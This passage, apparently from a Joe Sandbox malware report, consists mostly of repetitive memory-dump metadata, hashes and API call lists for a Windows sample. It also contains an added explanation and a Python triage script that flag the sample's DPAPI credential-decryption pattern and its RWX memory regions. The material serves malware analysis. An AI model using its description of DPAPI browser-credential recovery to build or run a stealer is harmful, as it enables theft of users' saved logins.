                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ?>]$GaoE$Y\=
                                    • API String ID: 0-3927692836
                                    • Opcode ID: 6fb4ec97bee8dc214068cfd7ddc2d5908dcd1e8091028d487858f63ccd49ba56
                                    • Instruction ID: efa54a06c02d2ead96279d11cc734d7c6a6609eb4b7d32dd773fb49511b32461
                                    • Opcode Fuzzy Hash: 6fb4ec97bee8dc214068cfd7ddc2d5908dcd1e8091028d487858f63ccd49ba56
                                    • Instruction Fuzzy Hash: 9AB208F3A0C210AFE3046E2DEC8567ABBE9EF94720F16493DEAC4C3744E63558058697
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: a^aa$G~q$/h
                                    • API String ID: 0-28058989
                                    • Opcode ID: 5f118ac7241cfa3cf64bc4f80874fbb0d522f08b0484dc9077ef6f22d58a2976
                                    • Instruction ID: c01e04a651f7d8b3c25b11e300052487d50b3fc4bddfa0d5b30a946a6879c626
                                    • Opcode Fuzzy Hash: 5f118ac7241cfa3cf64bc4f80874fbb0d522f08b0484dc9077ef6f22d58a2976
                                    • Instruction Fuzzy Hash: 11A2D4F3A0C2009FE704AE29EC8567AFBE5EF94720F16893DE6C587344EA3558058797
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: u\$HroJ$Kw
                                    • API String ID: 0-2923540231
                                    • Opcode ID: 6d7277bae33ba28a51242f5d9ba53783d288243cac2aea8d6c790ddacc8f0c6a
                                    • Instruction ID: 5050ab236a371d76d634d0b04c52a1e522b2687842ac85eb65611a122d737b57
                                    • Opcode Fuzzy Hash: 6d7277bae33ba28a51242f5d9ba53783d288243cac2aea8d6c790ddacc8f0c6a
                                    • Instruction Fuzzy Hash: AE92F5F3A08204AFE704AE2DDC8567ABBE5EF94720F16893DEAC4C7344E63558418797
                                    APIs
                                    • CoCreateInstance.COMBASE(00C9E120,00000000,00000001,00C9E110,00000000), ref: 00C939A8
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00C93A00
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharCreateInstanceMultiWide
                                    • String ID:
                                    • API String ID: 123533781-0
                                    • Opcode ID: ee7841ed2226257b0f6bf31bda5905b1ff35e5a2c083fe93bd92c3891d29a8dc
                                    • Instruction ID: 1a4d71798cef2687512d1412a880bb8ee76055f89034678402a69aed26f61b80
                                    • Opcode Fuzzy Hash: ee7841ed2226257b0f6bf31bda5905b1ff35e5a2c083fe93bd92c3891d29a8dc
                                    • Instruction Fuzzy Hash: 3E41E870A40A289FDB24DB58CC99F9BB7B5BB48702F4041D8E618E72E0D7B16E85CF50
                                    APIs
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00C8A2D4
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00C8A2F3
                                    • LocalFree.KERNEL32(?), ref: 00C8A323
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                    • String ID:
                                    • API String ID: 2068576380-0
                                    • Opcode ID: fc919d0ed911ac3edea2a8b8e11b7c7d86166984c046e6b11f8aae4b82ef877b
                                    • Instruction ID: 2b3092e9ac3272bac587a8086c65ae64781ac68e00bbc58f4e01bd6c8a7bf189
                                    • Opcode Fuzzy Hash: fc919d0ed911ac3edea2a8b8e11b7c7d86166984c046e6b11f8aae4b82ef877b
                                    • Instruction Fuzzy Hash: 8F11D3B8A00209EFDB04DFA4D884AAEB7B5FB89305F104559E915A7350D770AA50CB61
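The two API call lists in this listing (CoCreateInstance followed by MultiByteToWideChar, and CryptUnprotectData followed by LocalAlloc and LocalFree) are the entries an analyst actually triages: the second is the DPAPI decrypt-then-free shape used to recover browser credentials and cookie keys, and both functions sit in an image region dumped with page protection 0x40. The Python below is an added example written for this page, not part of the Joe Sandbox report and not code from the sample: it parses entries in the format shown here (the sample text is copied from the page's own lines), decodes the protection field of the .sdmp filename (which dot-separated field carries it is an assumption inferred from the values 04, 40 and 80 seen on this page) and tags the DPAPI pattern, COM instantiation, a MAX_PATH-sized wide-char buffer and code located in an RWX image region. The tag names are the example's own.

```python
"""Triage helper for the per-function "APIs" entries of a Joe Sandbox listing.

Parses the API-call lines and the "Source File" dump name shown for each
function, decodes the dump region's page protection and tags behaviours an
analyst looks for in a stealer: DPAPI decryption, COM instantiation and
code living in an RWX image region.
"""
import re

# Constructed sample: the two "APIs" entries from this page, copied verbatim.
SAMPLE = """\
APIs
• CoCreateInstance.COMBASE(00C9E120,00000000,00000001,00C9E110,00000000), ref: 00C939A8
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00C93A00
Memory Dump Source
• Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
APIs
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00C8A2D4
• LocalAlloc.KERNEL32(00000040,00000000), ref: 00C8A2F3
• LocalFree.KERNEL32(?), ref: 00C8A323
Memory Dump Source
• Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
"""

API_RE = re.compile(
    r"^\s*•\s*(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)
SRC_RE = re.compile(
    r"^\s*•\s*Source File:\s*(?P<dump>[0-9A-Fa-f.]+)\.sdmp,\s*Offset:\s*(?P<base>[0-9A-Fa-f]{8})"
)

# winnt.h page-protection constants. Assumption (not documented Joe Sandbox
# behaviour): the fifth dot-separated field of the .sdmp name, which takes the
# values 04, 40 and 80 on this page, is the region's protection.
PAGE_PROTECT = {
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}


def parse_entries(text):
    """Split the listing into per-function entries, one per 'APIs' heading."""
    entries, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"apis": [], "base": None, "protect": None}
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur["apis"].append((m["name"], m["module"], args, int(m["ref"], 16)))
            continue
        m = SRC_RE.match(line)
        if m:
            cur["base"] = int(m["base"], 16)
            protect = int(m["dump"].split(".")[4], 16)
            cur["protect"] = PAGE_PROTECT.get(protect, "0x%08x" % protect)
    return entries


def tag_entry(entry):
    """Behaviour tags for one function; the tag names are this example's own."""
    refs = {name: ref for name, _, _, ref in entry["apis"]}
    tags = []
    # DPAPI blob decrypted and the output buffer released afterwards: the
    # shape of browser credential / cookie-key recovery in stealers.
    if {"CryptUnprotectData", "LocalFree"}.issubset(refs) and refs["CryptUnprotectData"] < refs["LocalFree"]:
        tags.append("dpapi_unprotect")
    if "CoCreateInstance" in refs:
        tags.append("com_instance")
    for name, _, args, _ in entry["apis"]:
        # cchWideChar == 0x104 == MAX_PATH: the destination is a path buffer.
        if name == "MultiByteToWideChar" and len(args) == 6 and args[5] == "00000104":
            tags.append("max_path_buffer")
    if entry["protect"] == "PAGE_EXECUTE_READWRITE":
        tags.append("rwx_image_region")
    return tags


def summarize(text=SAMPLE):
    """(address of first call, region protection, tags) for each function."""
    return [
        ("0x%08X" % e["apis"][0][3], e["protect"], tag_entry(e))
        for e in parse_entries(text)
        if e["apis"]
    ]


if __name__ == "__main__":
    for addr, protect, tags in summarize():
        print(addr, protect, ", ".join(tags))
```

Run against a full exported listing, the per-function tags give a quick map of which functions touch DPAPI and which live in regions whose protection was changed to execute-and-write, which is the same observation the report summarises as "changes PE section rights".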
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: &ra_$Ze'f
                                    • API String ID: 0-2306317784
                                    • Opcode ID: 2607e61c034cfa94173ea2481d9aaf1553f4af4ba4d98a9fea3eb64867ef748a
                                    • Instruction ID: e5e92c41a632f49cf6d0b5261b87c9f8eac7e9fc5338439f890af452d94aef96
                                    • Opcode Fuzzy Hash: 2607e61c034cfa94173ea2481d9aaf1553f4af4ba4d98a9fea3eb64867ef748a
                                    • Instruction Fuzzy Hash: 6DB259F3A0C2049FE3046E2DEC45A7ABBE9EF94720F16463DEAC4C7744EA3558058796
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: %r>y$Rk~
                                    • API String ID: 0-3305111540
                                    • Opcode ID: 0f1c3f5cab0e2af0c278669fb0012b6ad09e412eb566199b04a7d4e4fc7b5451
                                    • Instruction ID: 55613e1e5adb1b75cf8021763981e7f0588bc6ba925a6e3b51fed4d5d457f30a
                                    • Opcode Fuzzy Hash: 0f1c3f5cab0e2af0c278669fb0012b6ad09e412eb566199b04a7d4e4fc7b5451
                                    • Instruction Fuzzy Hash: 14B2E6F360C2049FE304AE29EC8567AFBE5EBD4720F1A893DEAC4C7744E63558058796
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: *P[$L}e~
                                    • API String ID: 0-1081260897
                                    • Opcode ID: 4e12368b1a90699a9d06a5e45e7086589f008cbaeaa1b4c60d84654c549eafa1
                                    • Instruction ID: 2970e5e7bc6ecb9ab2ab2a3fcec99149c4f19faaf092733282efa3830101c286
                                    • Opcode Fuzzy Hash: 4e12368b1a90699a9d06a5e45e7086589f008cbaeaa1b4c60d84654c549eafa1
                                    • Instruction Fuzzy Hash: 76B229F3A0C2049FE304AE2DEC8567BBBE5EF94720F1A893DE6C583744E93558058693
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 1IOo$5Nu
                                    • API String ID: 0-628492930
                                    • Opcode ID: f1039e87fa3ad202ed8bde91a3d595f5d5fb3be33f2b1763d80931774f3de476
                                    • Instruction ID: fa85172b3149b55bfefc5a0ae3e4e7709ed5a73f6f0c9047550df8e1ec3bab4a
                                    • Opcode Fuzzy Hash: f1039e87fa3ad202ed8bde91a3d595f5d5fb3be33f2b1763d80931774f3de476
                                    • Instruction Fuzzy Hash: AAB217F3A0C2049FE7046E2DDC8566AFBE9EF94720F1A493DEAC4C7744EA3558048697
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ?$__ZN
                                    • API String ID: 0-1427190319
                                    • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                    • Instruction ID: df57c92ffbbaaf836300418b122df1e174fa889119e4f51739364635e8452d10
                                    • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                    • Instruction Fuzzy Hash: 35721472908B189BD758CF14C88067EB7E2EFC5310F698A1DF7A59B291D3709D419B83
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
